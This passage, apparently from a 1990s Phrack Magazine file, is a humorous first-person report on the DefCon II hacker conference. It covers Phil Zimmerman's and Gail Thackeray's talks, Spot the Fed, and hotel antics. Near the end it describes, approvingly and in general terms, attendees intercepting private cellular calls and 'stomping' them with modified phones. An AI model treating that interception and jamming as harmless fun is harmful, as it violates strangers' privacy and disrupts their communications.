  14604. yours truly.) 
  14605.  
  14606. Of  the  360 registrees ("Plus whoever snuck in," added  Jeff)  I 
  14607. guess about 20% were so-called legitimate security people. That's 
  14608. not to belittle the mid-20's folks who came not because they were 
  14609. hackers, but because they like computers.  Period.  They hack for 
  14610. themselves and not on other systems, but DefCon II offered  some
  14611. thing for everyone.  
  14612.  
  14613. I  remember 25 years ago how my parents hated the way  I  dressed 
  14614. for  school or concerts or just to hang out: God forbid! We  wore 
  14615. those damned jeans and T-shirts and sneakers or boots! "Why can't 
  14616. you dress like a human being," my mother admonished me day  after 
  14617. day,  year after year.  So I had to check myself because I  can't 
  14618. relate  to Seattle grunge-ware. I'm just too damned old  to  wear 
  14619. shirts that fit like kilts or sequin crusted S&M leather  straps.  
  14620. Other   than  the  visual  cacophony  of  dress,   every   single 
  14621. hacker/phreak that I met exceeded my expectations in the area  of 
  14622. deportment.
  14623.  
  14624. These  are not wild kids on a rampage.  The stories  of  drug-in
  14625. duced  frenzies  and peeing in the hallways  and  tossing  entire 
  14626. rooms  of  furniture  out of the window that  emanated  from  the 
  14627. HoHoCons  seemed  a million miles away.  This was  admittedly  an 
  14628. opportunity  to party, but not to excess.  There was work  to  be 
  14629. done, lessons to be learned and new friends to make.  So  getting 
  14630. snot  nosed drunk or ripped to the tits or Ecstatically high  was 
  14631. just not part of the equation.  Not here.
  14632.  
  14633. Now   Vegas  offers something quite distinct  from  other  cities 
  14634. which host security or other conventions.  At a Hyatt or a Hilton 
  14635. or  any other fancy-ass over priced hotel, beers run $4 or  $5  a 
  14636. crack  plus  you're expected to tip the black tied  minimum  wage 
  14637. worker  for  popping the top.  The Sahara (for all of  the  other 
  14638. indignities we had to suffer) somewhat redeemed  itself by offer
  14639. ing an infinite supply of $1 Heinekens. Despite hundreds of  beer 
  14640. bottle  spread  around the huge conference area  (the  hotel  was 
  14641. definitely  stingy in the garbage pail business) public  drunken
  14642. ness  was  totally absent.  Party yes.  Out of control?  No  way.  
  14643. Kudos!
  14644.  
  14645. Surprisingly, a fair number of women (girls) attended.  A handful 
  14646. were there 'for the ride' but others . . . whoa! they know  their 
  14647. shit. 
  14648.  
  14649. I hope that's not sexist; merely an observation.  I run across so 
  14650. few  technically fluent ladies it's just a gut reaction.  I  wish 
  14651. there  were more.  In a former life, I owned a TV/Record  produc
  14652. tion  company called Nashville North. We specialized  in  country 
  14653. rock taking advantage of the Urban Cowboy fad in the late 1970's. 
  14654. Our crew of producers and engineers consisted of the   "Nashville  
  14655. Angels."  And boy what a ruckus they would cause when we recorded 
  14656. Charlie  Daniels  or Hank Williams: they  were  stunning.   Susan 
  14657. produced and was a double for Jacqueline Smith; we  called  Sally 
  14658. "Sabrina"  because  of her boyish appearance and  resemblance  to 
  14659. Kate Jackson.  A super engineer.  And there was Rubia Bomba,  the 
  14660. Blond  Bombshell,  Sherra,  who I eventually  married:  she  knew 
  14661. country music inside and out - after all she came from  Nashville 
  14662. in the first place.  
  14663.  
  14664. When we would be scheduled to record an act for live radio,  some 
  14665. huge famous country act like Asleep at The Wheel of Merle Haggard 
  14666. or Johnny Paycheck or Vassar Clements, she would wince in  disbe
  14667. lief when we cried, "who's that?"  Needless to say, she knew  the 
  14668. songs, the cues and the words.  They all sounded alike.   Country 
  14669. Music?  Ecch.  (So I learned.)
  14670.  
  14671. At  any rate, ladies, we're equal opportunity  offenders.   C'mon 
  14672. down and let's get technical.
  14673.  
  14674. As  the  throngs pressed to register, I saw an old  friend,  Erik 
  14675. Bloodaxe.   I've  known him for several years now and  he's  even 
  14676. come  over to baby sit the kids when he's in town.   (Good  prac
  14677. tice.)    Erik  is about as famous as they come in the  world  of 
  14678. hackers.   Above ground the authorities investigated him for  his 
  14679. alleged  participation in cyber crimes: after all, he was one  of 
  14680. the  founders of the Legion of Doom, and so, by default, he  must 
  14681. have done something wrong.  Never prosecuted, Erik Bloodaxe lives 
  14682. in  infamy amongst his peers.  To belay any naysayers,  Erik  ap
  14683. peared on every single T-shirt there.
  14684.  
  14685.             "I Only Hack For Money,"
  14686.                  Erik Bloodaxe
  14687.  
  14688. proclaimed  dozens of shirts wandering through  the  surveillance 
  14689. laden casinos. His is a name that will live in infamy.  
  14690.  
  14691. So  I  yelled  out, "Hey Chris!"  He gave  his  net-name  to  the 
  14692. desk/table registrar. "Erik Bloodaxe."
  14693.  
  14694. "Erik  Bloodaxe?"  piped up an excited high pitched  male  voice.  
  14695. "Where?"  People pointed at Chris who was about to be  embarrass
  14696. ingly amused by sweet little tubby Novocain who practically bowed 
  14697. at Chris's feet in reverence.  "You're Erik Bloodaxe?"   Novocain 
  14698. said  with nervous awe - eyes gleaming up at Chris's  ruddy  skin 
  14699. and blond pony-tail.  
  14700.  
  14701. "Yeah,"  Chris  said in the most off handed  way  possible.   For 
  14702. people who don't know him this might be interpreted as  arrogance 
  14703. (and yes there is that) but he also has trouble publicly  accept
  14704. ing  the  fame  and respect that  his  endearing  next-generation 
  14705. teenage fans pour on him.
  14706.  
  14707. "Wow!"  Novocain  said with elegance and panache.   "You're  Erik 
  14708. Bloodaxe."  We'd just been through that said Chris's eyes.
  14709.  
  14710. "Yeah."
  14711.  
  14712. "Wow,  well,  um,  I  . . . ah . . . you're . . .  I  mean,  wow, 
  14713. you're  the best."  What does Sylvia Jane Miller from  Rumpsteer, 
  14714. Iowa  say to a movie star?  This about covered it.   The  Midwest 
  14715. meets  Madonna.   "Wow!"   Only here it's  Novocain  meets  Cyber 
  14716. Christ himself.
  14717.  
  14718.  
  14719.  
  14720. Like any other security show or conference or convention there is 
  14721. a kickoff, generally with a speech.  And DefCon II was no  excep
  14722. tion.  Except.
  14723.  
  14724. Most conventional conventions (ConCons) start at 7:30 or 8:00  AM 
  14725. because, well,  I don't know exactly why, except that's when  so-
  14726. called  suits are expected to show up in their cubicles.     Def
  14727. Con, on the other hand, was scheduled to start at 10PM on  Friday 
  14728. night  when  most  hakcers show up for work.  Most  everyone  had 
  14729. arrived  and we were anxiously awaiting the  opening  ceremonies.  
  14730. But, here is where Jeff's lack of experience came in.  The  kick-
  14731. off speaker was supposed to be Mark Ludwig of  virus writing fame 
  14732. and controversy.  But, he wasn't there!
  14733.  
  14734. He had jet lag.
  14735.  
  14736. "From Phoenix?" I exclaimed in mock horror to which nearby  hack
  14737. ers saw the absurdity of a 45 minute flight jet lag.  Mark has  a 
  14738. small  frame and looks, well, downright weak, so I figured  maybe 
  14739. flying  and  his constitution just didn't get along  and  he  was 
  14740. massaging his swollen adenoids in his room.  
  14741.  
  14742. "Oh,  no!  He's  just come in from Australia . .  ."   Well  that 
  14743. explains it, alright!  Sorry for the aspersions, Mark.
  14744.  
  14745. But Jeff didn't have a back up plan. He was screwed.  Almost four 
  14746. hundred people in the audience and nothing to tell them.  So, and 
  14747. I can't quite believe it, one human being who had obviously never 
  14748. stood  in front of a live audience before got up in an  impromptu 
  14749. attempt  at stand up comedy.  The audience was ready  for  almost 
  14750. anything  entertaining but this guy wasn't. Admittedly it  was  a 
  14751. tough spot, but . . .
  14752.  
  14753. "How do you turn a 486 into an 8088?"  
  14754.  
  14755. "Add Windows."  Groan. Groan.
  14756.  
  14757. "What's  this?"  Picture the middle three fingers of  your  right 
  14758. hand wiggling madly.
  14759.  
  14760. "An  encrypted  this!"   Now hold out  just  the  middle  finger.  
  14761. Groan.  Groan.
  14762.  
  14763. "What's  this?"   Spread your legs slightly  apart,  extend  both 
  14764. hands to the front and move them around quickly in small circles.
  14765.  
  14766. "Group Air Mouse."  Groan. 
  14767.  
  14768. The  evening  groaned on with no Mark nor any able  sharp  witted 
  14769. comedian in sight. 
  14770.  
  14771.  
  14772.  
  14773. Phil  Zimmerman wrote PGP and is a God, if not Cyber-Christ  him
  14774. self to much of the global electronic world.  Preferring to  call 
  14775. himself a folk hero (even the Wall Street Journal used that term) 
  14776. Phil's diminutive height combined with a few too many pounds  and 
  14777. a  sweet  as sweet can be smile earn him the title  of  Pillsbury 
  14778. Dough  Boy look alike.  Phil is simply too nice a guy to  be  em
  14779. broiled  in a Federal investigation to determine if he broke  the 
  14780. law  by  having PGP put on a net site.  You see, the  Feds  still 
  14781. think  they can control Cyberspace, and thereby maintain  antique 
  14782. export laws: "Thou shalt not export crypto without our  approval" 
  14783. sayeth the NSA using the Department of Commerce as a whipping boy 
  14784. mouth  piece.  So now Phil faces 41-51 months of  mandatory  jail 
  14785. time if prosecuted and convicted of these absurd laws.  
  14786.  
  14787. Flying  in from Colorado, his appearance was  anxiously  awaited. 
  14788. "He's really coming?"  " I wonder what he's like?"  (Like  every
  14789. one  else, fool, just different.)  When he did arrive, his  shit-
  14790. eating  grin  which really isn't a shit-eating  grin,  it's  just 
  14791. Phil's own patented grin, preceeded him down the hallway.  
  14792.  
  14793. "Here  he is!"  "It's Phil Zimmerman."  Get down and bow.   "Hey, 
  14794. Phil the PGP dude is here."
  14795.  
  14796. He  was  instantly surrounded by those who recognize him  and  by 
  14797. those  who  don't but  want  to  feel like part of the  in-crowd.  
  14798. Chat chat, shit-eating grin, good war stories and G-rated  pleas
  14799. antries.  Phil was doing what he does best: building up the  folk 
  14800. hero image of himself.  His engaging personality (even though  he 
  14801. can't  snorkel to save his ass) mesmerized the young-uns  of  the 
  14802. group.  "You're Phil?"  
  14803.  
  14804. "Yeah."   No  arrogance,  just a warm  country  shit-eating  grin 
  14805. that's  not really shit-eating.  Just Phil being Phil.  He  plays 
  14806. the part perfectly.
  14807.  
  14808. Despite the attention, the fame, the glory (money? nah . . .) the 
  14809. notoriety and the displeased eyes of onlooking Computer Cops  who 
  14810. really  do  believe he belongs in jail for 4 years,  Phil  had  a 
  14811. problem tonight.  A real problem.
  14812.  
  14813. "I  don't have a room!" he quietly told Jeff at the desk.   "They 
  14814. say  I'm  not registered."  No panic.  Just  a  shit-eating  grin 
  14815. that's not a shit-eating grin and hand the  problem  over  to the 
  14816. experts:  in  this case Jeff Moss.  Back to his  endearing  fans.  
  14817. Phil is so damned kind I actually saw him giving Cryptography 101 
  14818. lessons  on  the corner of a T-shirt encrusted table.  "This  is   
  14819. plaintext and this is crypto.  A key is like a key to your  hotel 
  14820. room . . . "   If only Phil had a hotel room.
  14821.  
  14822. Someone  had screwed up. Damn computers.  So the search  was  on.  
  14823. What had happened to Phil's room?  Jeff is scrambling and  trying 
  14824. to  get the hotel to rectify the situation. Everyone  was  abuzz.  
  14825. Phil,  the  crypto-God himself was left out in  the  cold.   What 
  14826. would he do?
  14827.  
  14828. When  suddenly, out of the din in the halls, we heard  one  voice 
  14829. above all the rest:
  14830.  
  14831. "Phil can sleep with me!"  
  14832.  
  14833. Silence.   Dead stone cold silence.  Haunting silence like  right 
  14834. after  an  earthquake and even the grubs and  millipedes  are  so 
  14835. shaken they have nothing to say.  Silence. 
  14836.  
  14837. The  poor kid who had somehow instructed his brain to  utter  the 
  14838. words  and permitted them to rise through his esophagus  and  out 
  14839. over  his  lips stood the object of awe, incredulity  and  mental 
  14840. question marks.  He must have thought to himself, "what's  every
  14841. one  staring  at?  What's going on?  Let me in on it."   For  the 
  14842. longest  10 seconds in the history of civilization he  had  abso
  14843. lutely no clue that he was the target of attention.  A handful of 
  14844. people even took two or three steps back, just in case.  Just  in 
  14845. case of what was never openly discussed, but nonetheless, just in 
  14846. case.
  14847.  
  14848. And  then the brain kicked in and a weak sheepish smile of  guilt 
  14849. overcame  this cute acne-free baby-butt smooth-faced  hacker  who 
  14850. had  certainly  never had a shave, and was barely old  enough  to 
  14851. steer his own pram. 
  14852.  
  14853. "Ohhhhhh . . . . noooooo," he said barely louder than a  whisper.  
  14854. "That' not what I mean!"
  14855.  
  14856. I nearly peed laughing so hard in unison with a score of  hackers 
  14857. who agreed that these misspoken words put this guy in the unenvi
  14858. able  position  of being the recipient of a  weekend  of  eternal 
  14859. politically incorrect ridicule.  
  14860.  
  14861. "Yeah, right.  We know what you mean . . "
  14862.  
  14863. "No  really . . ." he pleaded as the verbal assaults on  his  al
  14864. leged sexual preferences were slung one after the other.  
  14865.  
  14866. This  poor kid never read Shakespeare: "He who doth  protest  too 
  14867. much . . ."  
  14868.  
  14869. If  we  couldn't have a great kickoff speech, or  comedian,  this 
  14870. would have to do.  
  14871.  
  14872. The majority of the evening was spent making acquaintances:
  14873.  
  14874. "Hi, I'm Jim.  Oops, I mean 'Septic Tank," was greeted with  "Oh, 
  14875. you're Septic. I'm Sour Milk."  (Vive la difference!) People  who 
  14876. know  each  other electronically are as surprised to  meet  their 
  14877. counterparts  as are first daters who are in love with the  voice 
  14878. at  the other end of the phone.  "Giving good phone" implies  one 
  14879. thing while "Having a great keystroke" just might mean another.  
  14880.  
  14881. The din of the crowd was generally penetrated by the sounds of  a 
  14882. quasi-pornographic  Japanese high tech toon of  questionable  so
  14883. cially redeeming value which a majority of the crowd appeared  to 
  14884. both  enjoy and understand.  I am guilty of neither by reason  of 
  14885. antiquity.
  14886.  
  14887. And so it goes.
  14888.  
  14889.             * * * * * 
  14890.  
  14891. Phil Zimmerman must have gotten a room and some sleep because  at 
  14892. 10AM  (or closely thereafter) he gave a rousing (some  might  say 
  14893. incendiary)  speech  strongly attacking the  government's  nearly 
  14894. indefensible position on export control  
  14895.  
  14896. I was really impressed.  Knowing Phil for some time, this was the 
  14897. first  time I ever heard him speak and he did quite an  admirable 
  14898. job.  He ad libs, talks about what he want to talk about and does 
  14899. so in a compelling and emotional way. His ass is on the line  and 
  14900. he  should be emotional about it.  The audience, indeed  much  of 
  14901. counter culture Cyberspace loves Phil and just about anything  he 
  14902. has  to  say.  His affable 40-something attorney  from  Colorado, 
  14903. Phil  DuBois  was there to both enjoy the  festivities  and,  I'm 
  14904. sure,  to keep tabs on Phil's vocalizations.  Phil is almost  too 
  14905. honest  and open for his own good.  Rounds and rounds of  sincere 
  14906. appreciation.
  14907.  
  14908.  
  14909.  
  14910. Hey  kids,  now  it's time for another round  of  Spot  The  Fed.  
  14911. Here's  your  chance to win one of these wonderful "I  Spotted  A 
  14912. Fed" T-shirts. And all you have to do is ID a fed and it's yours.  
  14913. Look  around you?  Is he a Fed?  Is she under cover or under  the 
  14914. covers? Heh, heh.  Spot the Fed and win a prize.  This  one-size-
  14915. fits-all  XXX Large T-shirt is yours if you Spot the Fed.  I  had 
  14916. to  keep silent.  That would have been cheating.  I hang  out  on 
  14917. both sides and have a reputation to maintain.
  14918.  
  14919. "Hey,  I  see one" screeched a female voice (or  parhaps  it  was 
  14920. Phil's  young admirer) from the left side of the 400+ seat  ball
  14921. room.   Chaos!  Where? Where?  Where's the fed?  Like  when  Jose 
  14922. Consenko  hits  one  towards the center field  fence  and  70,000 
  14923. screaming  fans  stand on their seats to get a better view  of  a 
  14924. three inch ball 1/4 mile away flying at 150 miles per  hour, this 
  14925. crowd stood like  Lemmings  in view of Valhalla the Cliff to espy  
  14926. the  Fed.  Where's the Fed?
  14927.  
  14928. Jeff jumped off the stage in anxious anticipation that yet anoth
  14929. er anti-freedom-repressive law enforcement person had blown   his  
  14930. cover.   Where's the Fed?  Jeff is searching for the accuser  and 
  14931. the  accused.  Where's the Fed?  Craned necks as far as  the  eye 
  14932. can see; no better than rubber neckers on Highway 95 looking  for 
  14933. steams of blood and misplaced body parts they half expected a Fed 
  14934. to  be  as  distinctly obvious as Quasimoto  skulking  under  the 
  14935. Gorgoyled parapits of Notre Dame.  No such luck.  They look  like 
  14936. you and me. (Not me.)  Where's the Fed?
  14937.  
  14938. He's getting closer, closer to the Fed.  Is it a Fed?  Are you  a 
  14939. Fed?  C'mon, fess up.  You're a a fed. Nailed.  Busted.  Psyche!
  14940.  
  14941. Here's  your  T-shirt.   More fun than Monty  Hall  bringing  out 
  14942. aliens  from behind Door #3 on the X-Files.  Good clean fun.  But 
  14943. they didn't get 'em all.  A couple of them were real good.   Must 
  14944. have  been  dressed  like an Hawaiian surf bum  or  banshee  from 
  14945. Hellfire, Oregon.  Kudos to those Feds I know never got  spotted.  
  14946. Next year, guys.  There's always next year.
  14947.  
  14948. Phil's notoriety and the presence of the Phoenix, Arizona prosecu
  14949. tor   who was largely responsible for the dubiously effective  or 
  14950. righteous  Operation  Sun Devil, Gail Thackeray  ("I  change  job 
  14951. every 4 years or so - right after an election")  brought out  the 
  14952. media.  The LA TV station thought they might have the makings  of 
  14953. a story and sent a film crew for the event.  
  14954.  
  14955. "They're Feds. The ones with the cameras are Feds.  I know it. Go 
  14956. ask 'em."  No need. Not. 
  14957.  
  14958. "Put away that camera."  At hacking events it's proper  etiquette 
  14959. to ask if people are camera shy before shooting.   The guy that I 
  14960. was  sitting next to buried his face in his hands to avoid  being 
  14961. captured on video tape. 
  14962.  
  14963. "What are you; a Fed or a felon?" I had to ask.
  14964.  
  14965. "What's the difference," his said.  "They're the same thing."  So 
  14966. which  was it, I wondered.  For the truly paranoid by  the  truly 
  14967. paranoid.   
  14968.  
  14969. "Get  that  thing outta here," he motioned to the film  crew  who 
  14970. willingly  obliged  by turning off the lights.   "They're  really 
  14971. Feds,"  he whispered to me loud enough for the row in  front  and 
  14972. behind us to hear.  
  14973.  
  14974. I moved on.  Can't take chances with personal safety when I  have 
  14975. kids to feed.  Fed or felon, he scared me.
  14976.  
  14977. Gail Thackeray  was the next act on stage. She was less in agree
  14978. ment about Phil Zimmerman than probably anyone (except the  unde
  14979. tected Feds) in the audience.  She, as expected, endorsed much of 
  14980. the  law  enforcement programs that revolve  around  various  key 
  14981. management  (escrow) schemes.  Phil recalls a letter  from  Burma 
  14982. that  describe how the freedom fighters use PGP to  defend  them
  14983. selves against repression.  He cites the letter from Latvia  that 
  14984. says  electronic  freedom as offered by PGP is one of  the  only   
  14985. hopes for the future of a free Russia.  Gail empathizes but  sees 
  14986. trouble  closer  to home. Terrorism a la World Trade  Center,  or 
  14987. rocket launchers at O'Hare Airport, or little girl snuff films in 
  14988. Richmond,  Virginia,  or the attempt to poison the  water  supply 
  14989. outside of Boston.  These are the real threats to America in  the 
  14990. post Cold War era.
  14991.  
  14992. "What about our personal privacy!" cries a voice.  "We don't want 
  14993. the  government listening in.  It's Big Brother 10  years  behind 
  14994. schedule." 
  14995.  
  14996. Gail  is amused.  She knew it would be a tough audience  and  has 
  14997. been through it before.  She is not shaken in the least.  
  14998.  
  14999. "I've read your mail," she responds.  "Its not all that interest
  15000. ing."   The audience appreciates a good repartee. "You gotta  pay 
  15001. me  to  do this, and frankly most of it is pretty  boring."   She 
  15002. successful made her point and kept the audience laughing all  the 
  15003. way.
  15004.  
  15005. She then proceeded to tell that as she sees it, "The  expectation 
  15006. of  privacy isn't real."  I really don't like hearing this for  I 
  15007. believe  in the need for an Electronic Bill of Rights.  I  simply 
  15008. think she's wrong.  "History is clear," she said  "the ability to 
  15009. listen in used to be limited to the very few.  The telegraph  was 
  15010. essentially  a  party line and still today in  some  rural  areas 
  15011. communications aren't private.  Why should we change  it now?"
  15012.  
  15013. "Gail,  you're so full of shit!" A loud voice bellowed from  next 
  15014. to me again. Boy can I pick seats. "You know perfectly well  that 
  15015. cops  abuse the laws and this will just make their  jobs  easier. 
  15016. Once people find a way to escape tyranny you all want to bring it 
  15017. right  back again.  This is revolution and you're scared of  los
  15018. ing.  This kind of puke scum you're vomiting disgusts me.  I just 
  15019. can't  take it any more. " Yeah, right on.   Scattered  applause.  
  15020. While  this  'gent' may have stated what was on many  minds,  his 
  15021. manner was most unbefitting a conference and indeed, even  DefCon 
  15022. II.   This was too rude even for a hacker get-together.  The  man 
  15023. with  the  overbearing comments sat down apologizing.  "She  just 
  15024. gets  me going, she really does.  Really pisses me off  when  she 
  15025. goes on like about how clean the Feds are.  She knows better than 
  15026. to run diarrhea of the mouth like that."
  15027.  
  15028. "You  know,"  she continued.  "Right across the street is  a  Spy 
  15029. Shop.  One of those retail stores where you can buy bugs and taps 
  15030. and eavesdropping equipment?"  The audience silently nodded.  "We 
  15031. as law enforcement are prohibited by law from shopping there  and 
  15032. buying  those same things anyone else can.  We're losing on  that 
  15033. front."  Cheers. Screw the Feds.
  15034.                               ==Phrack Magazine==
  15035.  
  15036.                  Volume Five, Issue Forty-Six, File 20 of 28
  15037.  
  15038. ****************************************************************************
  15039.  
  15040.                   (Cyber Christ Meets Lady Luck Continued)
  15041.  
  15042.  
  15043. I  don't agree with everything that Gail says, but she is a  com
  15044. pelling  speaker; she believes in what she says.  But I do  agree 
  15045. with  her  on  the difficulty of forensic  evidence  in  computer 
  15046. cases.
  15047.  
  15048. "I  got  really mad," she said.  "I was reading  a  magazine  and 
  15049. there was an ad for United, you know, the employee owned airline.  
  15050. And it was a beautiful ad, hundred of employees standing in front 
  15051. of  a brand new great big jet. All smiling and happy." Gail  then 
  15052. frowned deeply.  "Some stockholder ought to sue them for mislead
  15053. ing  advertising."  This was more like it!  Go, Gail! "I  started 
  15054. to look at the picture carefully and I noticed this  unmistakably 
  15055. fat lady in a pink dress.  And then over a few persons. .  .guess 
  15056. what?  The  same fat lady in pink."  Roars of  laughter  and  ap
  15057. plause.  
  15058.  
  15059. Her point? What seems real may not be real at all, and with a few 
  15060. hundred  dollars in software and a little practice,  most  anyone 
  15061. can build a false reality digitally.  
  15062.  
  15063. Her time was up but the audience wanted more.  She was mobbed for 
  15064. eternity by hackers who fight her tooth and nail but respect  her 
  15065. comportment  enough to make the disagreements  lively,  partisan, 
  15066. entertaining, but with respect.  Respectful hackers.  No  HoHoCon 
  15067. orgies; merely verbal barbs with no solution. Everyone knew that, 
  15068. but it's the battle that counts.
  15069.  
  15070. More  security  conference should be this open, this  honest  and 
  15071. informative, with all kinds of people with all kinds of opinions.  
  15072. That  is  how we, and I, learn.  Listen and learn.  And  all  for 
  15073. $5000 no less, plus a paltry $15 entrance fee.
  15074.  
  15075.             * * * * *
  15076.  
  15077. The afternoon sessions were filled with a mixture of anti-govern
  15078. ment,  pro-privacy  advocacy, virus workshops and  such  by  both 
  15079. under  and above ground folks.  Padgett Peterson's  knowledge  of 
  15080. viruses  is deep and he spread the same wisdom as his does in  so 
  15081. called  legitimate circles.  Knowledge is knowledge,  and  better 
  15082. accurate than wrong.
  15083.  
  15084. It's  often  surprising  to see how people will  voice  the  same 
  15085. opinion  in  varying  degree of intensity  depending  upon  their 
  15086. audience.  Mark Aldrich of General Research Corp. in the Washing
  15087. ton area made a statement that I doubt I would hear at a  ConCon. 
  15088. "Fear  your  government  that fears your crypto.  Use  crypto  as 
  15089. a weapon."  Sara Gordon's panel discussion on crypto  and privacy 
  15090. and  related topics fueled the audience's general anti-fed  atti
  15091. tude.
  15092.  
  15093. "I  was bugged by the Feds."  "So was I?"  "What can we do  about 
  15094. it."   "Yeah, they listen in on my phones, too.  I can  hear  the 
  15095. clicks."  Right.
  15096.  
  15097. As  Mark  so succinctly put it, "if the government wants  to  bug 
  15098. you, you'll never know.  They're that good.".  That kind of  shut 
  15099. up  the dilettante paranoids in the group, albeit  mumbling  that 
  15100. they just knew that they were the victim of one of the 900 or  so 
  15101. court  approved  wire taps last year.  Right.  I think Gail  was   
  15102. right: some of you guys are too boring to be believed.
  15103.  
  15104. The  afternoon edition of the Spot A Fed contest took us  on  the 
  15105. run. I  actually succombed to their enthusiasm and a general lack  
  15106. of better judgement and followed a group of 8 or 10 to unmask  an 
  15107. unmarked white van in the parking lot. 
  15108.  
  15109. "It's the Feds." "How do you know?"  "Oh, it's the Feds alright."  
  15110. "How do you know."  "It's a white van and the intelligence  serv
  15111. ices  use white vans."  "What are you going to do?"  "Bust  'em."  
  15112. "Bust 'em for what?"  "For being Feds."  
  15113.  
  15114. This motley crew traipsed through the mile long casino,  trodding 
  15115. upon the ugly tartan/paisley carpets so obnoxiously loud a  blind 
  15116. man  could  cry "Uncle!", into the Hall  of   Overpriced  Shoppes 
  15117. through the lobby and over to the parking garage.  We had to have 
  15118. $100,000 of surveillance gear in tow:(enough to detect the planet 
  15119. Pluto fart in b-flat).  Radio receivers and eavesdropping  equip
  15120. ment  were courtesy of my pal Mike Peros. The goal was,  if  this 
  15121. was a Fed van, we could hear it.  I don't think so, but I go  for 
  15122. the  ride and a few minutes of reprieve away from the  conference 
  15123. hall. 
  15124.  
  15125. As we near, the excitement grows among the more paranoid who  are 
  15126. trying to instill their own mental foibles into their  companions 
  15127. and  sheer terror in normal old Vegas visitors who have  no  idea 
  15128. what they've walked into.
  15129.  
  15130. Feds? Not. Surrepticious radio transmissions?  Just hotel securi
  15131. ty  tracking the movements of 8 or 10 paranoids (and  one  writer 
  15132. with  nothing else to do for a half hour) into a  parking  garage 
  15133. which has more cameras than NBC.  Feds?  Of course not.  Don't be 
  15134. ridiculous. 
  15135.  
  15136.             * * * * * 
  15137.  
  15138. To say nothing worthwhile occurred until 11PM that evening  would 
  15139. be lying, but this thing, this DefCon II thing, was turning  into 
  15140. what  I would have called 25 years ago, a Love-In.  The  partici
  15141. pants were giddy from the event, the camaraderie, the $1  Heinek
  15142. ens and the hacking.  The Sahara  was actually pretty good  about 
  15143. it. Jeff got the conference space for free because he  guaranteed 
  15144. that  at least 100 hotel rooms would be booked by  "computer  en
  15145. thusiasts coming to a small computer conference."  Little did the 
  15146. hotel  know that half the crowd was too young to drink, too broke 
  15147. to gamble, and conspicuous enough to ward off legitimate clients.  
  15148. But a deal's a deal.
  15149.  
  15150. The hotel operators went out of their way and allegedly gave  the 
  15151. hackers permission to hack through the PBX in order to provide  a 
  15152. SLPP connection.  
  15153.  
  15154. "Just put it back the way you found it when you're done," was the 
  15155. hotel's only and quite reasonable request.
  15156.  
  15157. In my day an equivalent event producing an equivalent social non-
  15158. drug  induced high would have been achieved by tossing a  Frisbee 
  15159. to  Grace  Slick (Lead singer Jefferson Airplane)  and  have  her 
  15160. throw it back. We didn't have the kind of technology that today's 
  15161. rebellious  age has.  We had the Beatles and Jimi  Hendrix,  safe 
  15162. sex (kinda), safe drugs (well, maybe a little safer) and a cause.  
  15163. But no technology to speak of.
  15164.  
  15165. When  I  was on the publishing staff of the New  York  City  Free 
  15166. Press  in  1968/9 we wrote our  anti-establishment  diatribes  by 
  15167. hand.   By hand! And then we went down to a dark office  late  at 
  15168. night to use their typesetting gear when it was idle.  It took no 
  15169. more  than a blushing glance around the room to realize  that  we 
  15170. impressionable teens were publishing our political extremisms  on 
  15171. equipment courtesy of Al Goldstein and Screw magazine.  Now  that 
  15172. was an education.  
  15173.  
  15174. DefCon II was a Love-In, technology and all.  
  15175.  
  15176. Come  11PM yet another speaker canceled so  I offered to chat  to 
  15177. the  crowd for a half hour or so on Van Eck radiation; the  emis
  15178. sions  from  CRT's that make video screens readable from  a  dis
  15179. tance.   Now this wasn't a fill in at 2PM or anything.   Sessions 
  15180. reconvened at 11PM and I spoke to a full audience who were  there 
  15181. to get a midnight lesson in cellular hacking.
  15182.  
  15183. Most  above ground types still believe that hacking is  an  acne-
  15184. faced  teenager,  chigging  Jolt Cola,  wolfing  down  pepperoni 
  15185. pizza  and causing Corporate America no end of grief.  To a  cer
  15186. tain extent some of this is true.  But hacking is so much more.
  15187.  
  15188. As  Rop  Gongrijjp, editor of Hacktic once told me,  "hacking  is 
  15189. disrespect of technology."  It's going the extra mile to find out 
  15190. how things work.  Many of the older hackers, those in their early 
  15191. 20's  and older, are migrating from the  conventional  dial-em-up 
  15192. and  break-in hacking image to the fine art of cellular  hacking. 
  15193. How  do these things work?  What are the frequencies? How  can  I 
  15194. customize my phone?  How many channels can I scan?  The possibil
  15195. ities are endless as I soon learned.
  15196.  
  15197. Jim and Bill (fake names) asked if I wanted to see a great  demo. 
  15198. Sure!   No  names, they said.  OK.  No problem.  In  one  of  the 
  15199. several  thousand hotel rooms at the Sahara was a pile of  equip
  15200. ment  to make an under budgeted  FBI surveillance  team  insanely 
  15201. jealous. There in the middle of the ridiculously filthy room that 
  15202. no  doubt caused the maid to shudder, sat a log periodic  antenna 
  15203. poised  atop  a strong and highly  adjustable  photographic-style 
  15204. tripod.   Feeding  the antenna was a hunk of coax attached  to  a 
  15205. cell phone's antenna jack.
  15206.  
  15207. OK, so what's that?  Free cell calls?  No, much more.
  15208.  
  15209. A second cell phone/scanner, an Oki 900 was modified and connect
  15210. ed to a laptop computer.  (This was the exact modification  being 
  15211. discussed downstairs)  Custom software that was freely   distrib
  15212. uted  around DefCon scanned the data from the Oki  and  displayed 
  15213. the scanning activity. A pair of speakers then audibly  broadcast 
  15214. the  specific conversation.  And in Vegas, you can  imagine  what 
  15215. was going over the open airwaves!
  15216.  
  15217. A  half dozen 'kids' sat around enthralled, each begging for  his 
  15218. turn to, as Jim put it, "harass cellular users.  Pure and simple. 
  15219. Harassment. Stomp on the son of a bitch,"  he laughed, joined  in 
  15220. by the others. 
  15221.  
  15222. When a 'good' conversation was detected, they entered the channel 
  15223. into  the broadcasting cell phone and spoke.  And talk they  did. 
  15224. Essentially  they turned 'private' conversations  into  wide-band 
  15225. free-for-alls.  If they spoke for only a few seconds one or  both 
  15226. of  the parties could hear what was being said.  If  they  talked 
  15227. for  too  long, the overpowering signal from  the  antenna  would 
  15228. literally  wipe  out the chat: the cell switch  reacted  with  an 
  15229. internal belch and shut down. Stomping, they called it.  
  15230.  
  15231. For  those on the receiving end of the harassment, it  must  have 
  15232. sounded  like  the overbearing voice of God telling Noah  how  to 
  15233. build the Ark.
  15234.  
  15235. "Noah?"
  15236.  
  15237. "Who dat?
  15238.  
  15239. "Noah?"
  15240.  
  15241. "Who is that?"
  15242.  
  15243. What terror lurks in the minds of boys . . .
  15244.  
  15245. For  those  old enough to remember, stomping is no more  a  stunt 
  15246. than putting a 500 watt linear power amplifier on a CB radio  and 
  15247. blasting nearby CB's to kingdom come.  The truckers used to do it 
  15248. to  4-wheelers. When the police began monitoring CB channels  "to 
  15249. protect  and  serve" they became the target of CB  stomping.   So 
  15250. what else is new?  
  15251.  
